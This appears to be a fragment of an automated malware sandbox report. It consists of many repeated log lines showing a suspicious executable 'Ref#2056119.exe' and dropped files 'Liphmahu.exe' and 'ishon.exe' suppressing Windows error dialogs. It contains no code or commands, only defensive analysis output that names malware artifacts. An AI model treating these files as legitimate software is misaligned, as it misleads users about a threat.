                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOX
